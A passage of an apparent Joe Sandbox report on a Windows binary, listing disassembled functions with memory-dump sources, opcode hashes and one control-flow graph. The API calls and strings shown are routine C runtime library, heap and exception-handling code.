                                                                          • Opcode ID: 11455f847af0625b085217f30496c1a7630994312d3501f62ade35e37805c853
                                                                          • Instruction ID: 3ba38fb9d64641b5adea3b57b886b4d2855cb90ada2d68db1854d3d147424937
                                                                          • Opcode Fuzzy Hash: 11455f847af0625b085217f30496c1a7630994312d3501f62ade35e37805c853
                                                                          • Instruction Fuzzy Hash: 18510B26B0479284FB10EBB2A8403AEBBA5FB447D4F944176EE5C27A96EF3CD005C311
                                                                          Function 00007FF7EA02B60C Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: HeapProcess
                                                                          • String ID:
                                                                          • API String ID: 54951025-0
                                                                          • Opcode ID: 181ca50088a22b940bfcf21f43d0ad86da502b3a7c54341bba47fe5b1dffb0e5
                                                                          • Instruction ID: e4dc9c0f4a00fd46bdc463aa90be590175a10cf224feb85d8e9f713e14fc8c88
                                                                          • Opcode Fuzzy Hash: 181ca50088a22b940bfcf21f43d0ad86da502b3a7c54341bba47fe5b1dffb0e5
                                                                          • Instruction Fuzzy Hash: 37B09224E17A07C6FA883B116D8671863A47F4C710FC841BAC40D80320EF3C20BE9722
                                                                          Function 00007FF7EA027628 Relevance: .1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFreeHeapLast
                                                                          • String ID:
                                                                          • API String ID: 485612231-0
                                                                          • Opcode ID: a2897b7abe81771b5069735a26e76c0be77e1c0b255e4eacc3f36685ca15dad1
                                                                          • Instruction ID: 071921d8e28dc80e771eb5ac7f1cf7cae7e8412c77aa10085b4fdbc8edfcf8ce
                                                                          • Opcode Fuzzy Hash: a2897b7abe81771b5069735a26e76c0be77e1c0b255e4eacc3f36685ca15dad1
                                                                          • Instruction Fuzzy Hash: 1C41E632B14A5A82FF04DF2ADA54369B391BB48FC4B899037DE1D87B55EE3CD0468310
                                                                          Function 00007FF7EA02F1C0 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 17929bfd204d8727f250f2c8a46c428b35dfb302384a2c4c12b77aac50e3775b
                                                                          • Instruction ID: 1eff3c2af03a34af39873c2597b5b90b07de7f02bfe0646f0cbf9ed7551836ca
                                                                          • Opcode Fuzzy Hash: 17929bfd204d8727f250f2c8a46c428b35dfb302384a2c4c12b77aac50e3775b
                                                                          • Instruction Fuzzy Hash: 2BF06D72B242574AE7D49F1CA442B257BD1F7043C0F90807ED59DC3B08D93C94648F15
                                                                          Function 00007FF7EA022968 Relevance: .0, Instructions: 2COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 60f007ad9aee672bf196016f1f46fca3ae989ecfd9538dc4e7d3b8125eb7273b
                                                                          • Instruction ID: 23317b8601ae9e3fb173b12dca8384eca3b87120a2532985f948f8e6ac215483
                                                                          • Opcode Fuzzy Hash: 60f007ad9aee672bf196016f1f46fca3ae989ecfd9538dc4e7d3b8125eb7273b
                                                                          • Instruction Fuzzy Hash: 8AA00161999943D1FA04AB60B990270A320AB58300BC000B3C00D414A1AE7CA4889222
                                                                          Function 00007FF7EA023D28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 314 7ff7ea023d28-7ff7ea023d8f call 7ff7ea024c40 317 7ff7ea0241f0-7ff7ea0241f7 call 7ff7ea027b60 314->317 318 7ff7ea023d95-7ff7ea023d98 314->318 318->317 319 7ff7ea023d9e-7ff7ea023da4 318->319 321 7ff7ea023daa-7ff7ea023dae 319->321 322 7ff7ea023e73-7ff7ea023e85 319->322 321->322 326 7ff7ea023db4-7ff7ea023dbf 321->326 324 7ff7ea023e8b-7ff7ea023e8f 322->324 325 7ff7ea024140-7ff7ea024144 322->325 324->325 327 7ff7ea023e95-7ff7ea023ea0 324->327 329 7ff7ea02417d-7ff7ea024187 call 7ff7ea023740 325->329 330 7ff7ea024146-7ff7ea02414d 325->330 326->322 328 7ff7ea023dc5-7ff7ea023dca 326->328 327->325 332 7ff7ea023ea6-7ff7ea023ead 327->332 328->322 333 7ff7ea023dd0-7ff7ea023dda call 7ff7ea023740 328->333 329->317 340 7ff7ea024189-7ff7ea0241a8 call 7ff7ea021e60 329->340 330->317 334 7ff7ea024153-7ff7ea024178 call 7ff7ea0241f8 330->334 337 7ff7ea024071-7ff7ea02407d 332->337 338 7ff7ea023eb3-7ff7ea023eee call 7ff7ea022e28 332->338 333->340 348 7ff7ea023de0-7ff7ea023e0b call 7ff7ea023740 * 2 call 7ff7ea023130 333->348 334->329 337->329 341 7ff7ea024083-7ff7ea024087 337->341 338->337 353 7ff7ea023ef4-7ff7ea023efd 338->353 345 7ff7ea024097-7ff7ea02409f 341->345 346 7ff7ea024089-7ff7ea024095 call 7ff7ea0230f0 341->346 345->329 352 7ff7ea0240a5-7ff7ea0240b2 call 7ff7ea022cc8 345->352 346->345 361 7ff7ea0240b8-7ff7ea0240c0 346->361 383 7ff7ea023e2b-7ff7ea023e35 call 7ff7ea023740 348->383 384 7ff7ea023e0d-7ff7ea023e11 348->384 352->329 352->361 354 7ff7ea023f02-7ff7ea023f34 353->354 358 7ff7ea023f3a-7ff7ea023f46 354->358 359 7ff7ea024060-7ff7ea024067 354->359 358->359 365 7ff7ea023f4c-7ff7ea023f65 358->365 359->354 367 7ff7ea02406d 359->367 363 7ff7ea0241d3-7ff7ea0241ef call 7ff7ea023740 * 2 call 7ff7ea027b34 361->363 364 7ff7ea0240c6-7ff7ea0240ca 361->364 363->317 368 7ff7ea0240cc-7ff7ea0240db call 7ff7ea0230f0 364->368 369 7ff7ea0240dd 364->369 371 7ff7ea023f6b-7ff7ea023fb0 call 7ff7ea023104 * 2 365->371 372 7ff7ea02405d 365->372 367->337 377 7ff7ea0240e0-7ff7ea0240ea call 7ff7ea024cd8 368->377 369->377 396 7ff7ea023fee-7ff7ea023ff4 371->396 397 7ff7ea023fb2-7ff7ea023fd8 call 7ff7ea023104 call 7ff7ea024468 371->397 372->359 377->329 392 7ff7ea0240f0-7ff7ea02413e call 7ff7ea022d58 call 7ff7ea022f5c 377->392 383->322 399 7ff7ea023e37-7ff7ea023e57 call 7ff7ea023740 * 2 call 7ff7ea024cd8 383->399 384->383 388 7ff7ea023e13-7ff7ea023e1e 384->388 388->383 393 7ff7ea023e20-7ff7ea023e25 388->393 392->329 393->317 393->383 403 7ff7ea024058 396->403 404 7ff7ea023ff6-7ff7ea023ffa 396->404 414 7ff7ea023fda-7ff7ea023fec 397->414 415 7ff7ea023fff-7ff7ea024053 call 7ff7ea023c54 397->415 418 7ff7ea023e59-7ff7ea023e63 call 7ff7ea024dc8 399->418 419 7ff7ea023e6e 399->419 403->372 404->371 414->396 414->397 415->403 422 7ff7ea023e69-7ff7ea0241cc call 7ff7ea023288 call 7ff7ea024824 call 7ff7ea0233ec 418->422 423 7ff7ea0241cd-7ff7ea0241d2 call 7ff7ea027b34 418->423 419->322 422->423 423->363
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 6a15194f8449d4c81a6fbdfc426842c04311243a5f0bdc02369175829e7694fc
                                                                          • Instruction ID: c77dbb3492e95c7ad7867bca7d9433e712d2fcf8187a2e37659e97d6e4361202
                                                                          • Opcode Fuzzy Hash: 6a15194f8449d4c81a6fbdfc426842c04311243a5f0bdc02369175829e7694fc
                                                                          • Instruction Fuzzy Hash: C6D1A672A087438AFB60AB25D4803ADB7A0FB55798F400176DE4D57B97EF39E091C722
                                                                          Function 00007FF7EA024F8C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7EA02523E,?,?,?,00007FF7EA024F30,?,?,?,00007FF7EA0236B5), ref: 00007FF7EA025011
                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7EA02523E,?,?,?,00007FF7EA024F30,?,?,?,00007FF7EA0236B5), ref: 00007FF7EA02501F
                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF7EA02523E,?,?,?,00007FF7EA024F30,?,?,?,00007FF7EA0236B5), ref: 00007FF7EA025049
                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF7EA02523E,?,?,?,00007FF7EA024F30,?,?,?,00007FF7EA0236B5), ref: 00007FF7EA0250B7
                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF7EA02523E,?,?,?,00007FF7EA024F30,?,?,?,00007FF7EA0236B5), ref: 00007FF7EA0250C3
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 355a7632359eb163f55104a1b7a3e990957cdca5e3f3cacfc805ca423a9a2768
                                                                          • Instruction ID: 83afd94d6e9aa650c6cef63006e79d63f1a33696c15e9a02645e5677309e3e86
                                                                          • Opcode Fuzzy Hash: 355a7632359eb163f55104a1b7a3e990957cdca5e3f3cacfc805ca423a9a2768
                                                                          • Instruction Fuzzy Hash: 8D31E421B0A74381FE11AB529880BF4A394BF48BA0F990676DD1D06792FF3CF4448372
                                                                          Function 00007FF7EA0280D4 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 981e065be60bd824e64a3e66d764953613c8448121f634bb6233c3e66bf49b4b
                                                                          • Instruction ID: 3f5ed43d010d307637262e390de7e9709ae5dc34a46047aacb72dca75f642cd1
                                                                          • Opcode Fuzzy Hash: 981e065be60bd824e64a3e66d764953613c8448121f634bb6233c3e66bf49b4b
                                                                          • Instruction Fuzzy Hash: 9A21AC24F0834341FA69B3615A46339E35A9F457A4F8446B6D83E466D7FE3CB4084272
                                                                          Function 00007FF7EA02EC84 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: cf935f717f77a2ed4f5315da510ef180c3cd57640c48bbb7dc0752fedfb25d3f
                                                                          • Instruction ID: 4c315ef16169267cca638df63c720fc280fbfd34282beb795fef0337101cc2e4
                                                                          • Opcode Fuzzy Hash: cf935f717f77a2ed4f5315da510ef180c3cd57640c48bbb7dc0752fedfb25d3f
                                                                          • Instruction Fuzzy Hash: 46118431A18F8282F750AB52E994329A7A0FB8CFE4F404276DA1D47794EF7CD4488751
                                                                          Function 00007FF7EA02824C Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00007FF7EA028629,?,?,?,?,00007FF7EA0286EC), ref: 00007FF7EA02825B
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7EA028629,?,?,?,?,00007FF7EA0286EC), ref: 00007FF7EA028291
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7EA028629,?,?,?,?,00007FF7EA0286EC), ref: 00007FF7EA0282BE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7EA028629,?,?,?,?,00007FF7EA0286EC), ref: 00007FF7EA0282CF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7EA028629,?,?,?,?,00007FF7EA0286EC), ref: 00007FF7EA0282E0
                                                                          • SetLastError.KERNEL32(?,?,?,00007FF7EA028629,?,?,?,?,00007FF7EA0286EC), ref: 00007FF7EA0282FB
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4df0ceb347f0534e1eacd45fb16a4e0394b627f6c1fe957197f1be5cfd6870b3
                                                                          • Instruction ID: 3392f418180db33c0121a9177fd4a0db9befc64ee200ef3b9e09c4b3c0d447b5
                                                                          • Opcode Fuzzy Hash: 4df0ceb347f0534e1eacd45fb16a4e0394b627f6c1fe957197f1be5cfd6870b3
                                                                          • Instruction Fuzzy Hash: 0711B824E08B8382FA64B3A15655339A3529F593A4F8446B7D93E426D3FE3CB4084232
                                                                          Function 00007FF7EA027318 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 4061214504-1276376045
                                                                          • Opcode ID: aa9257a99cc5efed4932380e29d31c577d9ff1d1924428f4dfe92cdc04ce7e16
                                                                          • Instruction ID: 40b4ee6a1e58f44cf4a0c2b7efc45810977222e450aaa95c40e0896183856134
                                                                          • Opcode Fuzzy Hash: aa9257a99cc5efed4932380e29d31c577d9ff1d1924428f4dfe92cdc04ce7e16
                                                                          • Instruction Fuzzy Hash: C0F04F61E1970781FF24AB25A454379D320AF497A1F940276DA6E852E4EF3CD549C321
                                                                          Function 00007FF7EA02EFD4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: _set_statfp
                                                                          • String ID:
                                                                          • API String ID: 1156100317-0
                                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction ID: 438d16ba449cac9bd0fcb87144f31de24ee823adcbafc3bde64b1f178db6838a
                                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                          • Instruction Fuzzy Hash: 10118B22E0CB1301F6543164D4C63B582C06F573E4FC506B7E96E462EBAE7CAC614632
                                                                          Function 00007FF7EA028314 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF7EA02637F,?,?,00000000,00007FF7EA02661A,?,?,?,?,?,00007FF7EA0265A6), ref: 00007FF7EA028333
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7EA02637F,?,?,00000000,00007FF7EA02661A,?,?,?,?,?,00007FF7EA0265A6), ref: 00007FF7EA028352
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7EA02637F,?,?,00000000,00007FF7EA02661A,?,?,?,?,?,00007FF7EA0265A6), ref: 00007FF7EA02837A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7EA02637F,?,?,00000000,00007FF7EA02661A,?,?,?,?,?,00007FF7EA0265A6), ref: 00007FF7EA02838B
                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF7EA02637F,?,?,00000000,00007FF7EA02661A,?,?,?,?,?,00007FF7EA0265A6), ref: 00007FF7EA02839C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID:
                                                                          • API String ID: 3702945584-0
                                                                          • Opcode ID: f5810ee2a76c2ef75e45980a18629cac2f84ac73fccf97f1cb59af300b2862ab
                                                                          • Instruction ID: 8dc86cddfb008621a2e00ab6e9a6ce9c1ebb8c302df413ec987b6f7577cd951c
                                                                          • Opcode Fuzzy Hash: f5810ee2a76c2ef75e45980a18629cac2f84ac73fccf97f1cb59af300b2862ab
                                                                          • Instruction Fuzzy Hash: D6113764E0834342FA68B7626A5137DA3569F453A8F9843B6E83D867D7FE3CB4054232
                                                                          Function 00007FF7EA0281A8 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID:
                                                                          • API String ID: 3702945584-0
                                                                          • Opcode ID: 320419ab2aab8cc2b65c0d929d4e63aa85ea9895c42e83fcaa073ceb7b238958
                                                                          • Instruction ID: a6cb0b87e8e7f03b82cfb41851fa2060b717c854b643ceeed0a6b1fe7c549d94
                                                                          • Opcode Fuzzy Hash: 320419ab2aab8cc2b65c0d929d4e63aa85ea9895c42e83fcaa073ceb7b238958
                                                                          • Instruction Fuzzy Hash: AA112728E0970701F9A9B6B15512379A3459F56378FD847B6D83E4A2D3FE3CB4498233
                                                                          Function 00007FF7EA023494 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm
                                                                          • API String ID: 2395640692-1018135373
                                                                          • Opcode ID: 35585f6fc7937097512eafd41edd286f8a1fccf88019c377510348655261b16f
                                                                          • Instruction ID: 9e1f158bb820c63fd1080a64d4ec8a7b11242f13f26385916d28c8d12d380896
                                                                          • Opcode Fuzzy Hash: 35585f6fc7937097512eafd41edd286f8a1fccf88019c377510348655261b16f
                                                                          • Instruction Fuzzy Hash: E451B232B197038EFB14EB15D448B38B395EB44B98F918176DA4D4378AEF7DE8418722
                                                                          Function 00007FF7EA0241F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2474307453.00007FF7EA021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7EA020000, based on PE: true
                                                                          • Associated: 00000000.00000002.2474289327.00007FF7EA020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474328982.00007FF7EA031000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474350645.00007FF7EA03B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.2474367471.00007FF7EA03D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ff7ea020000_xK44OOt7vD.jbxd
                                                                          Similarity
